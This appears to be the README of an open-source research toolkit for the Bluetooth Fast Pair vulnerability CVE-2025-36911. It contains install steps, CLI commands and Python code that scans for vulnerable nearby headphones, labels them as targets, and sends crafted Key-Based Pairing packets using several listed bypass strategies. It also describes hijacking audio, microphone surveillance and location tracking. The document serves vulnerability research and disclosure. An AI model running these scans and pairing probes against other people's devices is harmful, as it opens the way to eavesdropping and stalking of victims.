CVE-2025-36911 Reference Implementation & Vulnerability Verification Toolkit
LEGAL NOTICE: This is a security research tool. Read LEGAL.md before use. Unauthorized access to computer systems is a criminal offence.
Hijacking Bluetooth Accessories Using Google Fast Pair.
WhisperPair (CVE-2025-36911) is a critical vulnerability that allows attackers to forcefully pair with flagship audio accessories without user consent, often in under 10 seconds.
DIY-WhisperPair is a research toolkit implementing these attacks to demonstrate three key risks:
- Device Hijacking: Seizing control of audio and microphone streams by bypassing pairing mode checks.
- Location Tracking: Maliciously registering devices to Google's Find Hub Network to stalk victims.
- Cross-Ecosystem Impact: Exploiting accessories regardless of the paired phone (iOS or Android).
Note
Research Only: This toolkit contains Proof-of-Concept scanners and verifiers. It does not include tools for active eavesdropping, persistent location tracking, or malicious payload injection. Its purpose is solely to identify vulnerable devices.
# Install
git clone https://github.com/SpectrixDev/DIY-WhisperPair.git
cd DIY-WhisperPair
pip install -e .
# Run interactive CLI
whisperpairThis launches an interactive menu:
╦ ╦╦ ╦╦╔═╗╔═╗╔═╗╦═╗╔═╗╔═╗╦╦═╗
║║║╠═╣║╚═╗╠═╝║╣ ╠╦╝╠═╝╠═╣║╠╦╝
╚╩╝╩ ╩╩╚═╝╩ ╚═╝╩╚═╩ ╩ ╩╩╩╚═
────────────── Main Menu ──────────────
1 Scan Discover Fast Pair devices nearby
2 Verify Test device vulnerability (requires authorization)
3 Info Get detailed device information
4 About Learn about CVE-2025-36911
0 Exit Quit the application
Select option [1]:
This library is designed to be easily extensible. Import what you need:
import asyncio
from whisperpair import scan_devices, verify_device, get_device_info
# Scan for Fast Pair devices
devices = asyncio.run(scan_devices(timeout=10))
for d in devices:
print(f"{d.address} - {d.name} - Risk: {'HIGH' if not d.is_in_pairing_mode else 'Low'}")
# Find only vulnerable devices (not in pairing mode)
vulnerable = asyncio.run(scan_devices(vulnerable_only=True))
# Verify a specific device (REQUIRES AUTHORIZATION)
result = asyncio.run(verify_device("AA:BB:CC:DD:EE:FF"))
if result.success:
print(f"VULNERABLE - Provider: {result.provider_address}")
# Get device info
info = asyncio.run(get_device_info("AA:BB:CC:DD:EE:FF"))
print(f"Model: {info['model_name']}")from whisperpair import (
# Scanner
FastPairScanner,
FastPairDevice,
# Client
FastPairClient,
VerificationResult,
# Protocol
KeyBasedPairingRequest,
KeyBasedPairingResponse,
PairingRequestFlags,
parse_bluetooth_address,
parse_kbp_response_multi_strategy,
# Crypto
FastPairCrypto,
aes_128_encrypt,
aes_128_decrypt,
generate_account_key,
# Constants
FAST_PAIR_SERVICE_UUID,
KEY_BASED_PAIRING_CHAR_UUID,
KNOWN_MODEL_IDS,
)
# Custom scanner with callbacks
def on_found(device: FastPairDevice):
if not device.is_in_pairing_mode:
print(f"[!] Potential target: {device.address}")
scanner = FastPairScanner(timeout=15, on_device_found=on_found)
asyncio.run(scanner.scan())
# Build raw protocol packets (flags 0x11 = INITIATE_BONDING | EXTENDED_RESPONSE)
target_bytes = parse_bluetooth_address("AA:BB:CC:DD:EE:FF")
request = KeyBasedPairingRequest.for_verification(provider_address=target_bytes)
packet = request.build() # 16-byte plaintext
# Multiple verification strategies available:
# - strategy_raw_kbp() - flags 0x11, works on most vulnerable devices
# - strategy_with_seeker() - flags 0x02, includes seeker address
# - strategy_retroactive() - flags 0x0A, bypasses some checks
# - strategy_extended() - flags 0x10, for newer devices
# Full custom flow (AES key optional - response detection alone indicates vulnerability)
async with FastPairClient("AA:BB:CC:DD:EE:FF") as client:
model_id = await client.read_model_id()
result = await client.verify_pairing_behavior() # No key needed for detection
if result.response_received:
print("VULNERABLE - device responded when it shouldn't")See examples.py for copy-paste ready examples:
python examples.py scan # Basic scanning
python examples.py vulnerable # Find vulnerable devices
python examples.py verify AA:BB:CC:DD:EE:FF
python examples.py custom # Scanner with callbackswhisperpair# Scan for devices
whisperpair scan
whisperpair scan --vulnerable
whisperpair scan --timeout 15
# Get device info
whisperpair info AA:BB:CC:DD:EE:FF
# Verify vulnerability (requires flags)
whisperpair verify AA:BB:CC:DD:EE:FF --authorized
# Learn about the vulnerability
whisperpair aboutThis tool performs active Bluetooth operations. Before running any verification commands, you must have:
- Written permission from the device owner, OR
- Own the device yourself
| Jurisdiction | Relevant Law |
|---|---|
| UK | Computer Misuse Act 1990, Section 1-3A |
| US | Computer Fraud and Abuse Act (CFAA) |
| EU | Directive 2013/40/EU |
| Germany | § 202a-c StGB |
| Australia | Criminal Code Act 1995, Part 10.7 |
See LEGAL.md for detailed guidance.
Google Fast Pair requires devices to only accept pairing requests when in pairing mode. Many devices fail this check:
EXPECTED: Device checks "Am I in pairing mode?" → NO → Reject
ACTUAL: Device accepts request regardless of mode state
The vulnerability is detected by checking if a device responds at all to a Key-Based Pairing request when not in pairing mode:
graph TD
subgraph Packet["Key-Based Pairing Request (16 bytes)"]
direction LR
B0["0x00"]
B1["0x11"]
MAC["MAC: 6 bytes"]
Salt["Salt: 8 bytes"]
end
B0:::byte -- "Message Type" --> Desc0["Key-Based Pairing Request"]
B1:::byte -- "Flags" --> Desc1["INITIATE_BONDING | EXTENDED_RESP"]
classDef byte fill:#e1f5fe,stroke:#333,stroke-width:1px;
Detection: Response received = VULNERABLE (no AES key needed!)
An attacker within Bluetooth range (~10-14m) can:
- Play audio through victim's headphones
- Access microphone for surveillance
- Track location via Google Find Hub
| Manufacturer | Devices |
|---|---|
| Pixel Buds Pro 2 | |
| Sony | WF-1000XM4, WH-1000XM5, LinkBuds S |
| JBL | Tune Buds, Live Pro 2 |
| Anker | Soundcore Liberty 4 |
| Others | See whisperpair.eu |
DIY_WhisperPair/
├── src/whisperpair/
│ ├── __init__.py # Public API exports
│ ├── scanner.py # BLE device discovery
│ ├── client.py # GATT client & verification
│ ├── protocol.py # Packet builders
│ ├── crypto.py # AES-128, ECDH, keys
│ ├── constants.py # UUIDs, Model IDs
│ └── cli.py # Interactive CLI
├── examples.py # Copy-paste code snippets
├── security_demo.py # Standalone verification demo
├── LEGAL.md
└── README.md
git clone https://github.com/SpectrixDev/DIY-WhisperPair.git
cd DIY-WhisperPair
python3 -m venv venv
source venv/bin/activate # Linux/macOS
pip install -e .- Python 3.10+
- Bluetooth adapter with BLE support
- Linux: BlueZ 5.50+
- Windows: Windows 10 1703+
- macOS: macOS 10.13+
- Website: whisperpair.eu
- CVE: CVE-2025-36911
- Paper: "WhisperPair: Hijacking Bluetooth Accessories Using Google Fast Pair"
- Authors: KU Leuven DistriNet (Duttagupta, Antonijević, Preneel, Wyns, Singelée)
This tool is provided solely for:
- Security research and vulnerability verification
- Authorized penetration testing
- Device manufacturer validation
- Educational purposes
NOT for: Unauthorized access, harassment, surveillance, or any illegal activity.
MIT License - See LICENSE
- SpectrixDev - Project Maintainer
- KU Leuven DistriNet - Original research
- Google Android Security Team - Coordinated disclosure
- Seytonic - Excellent explainer video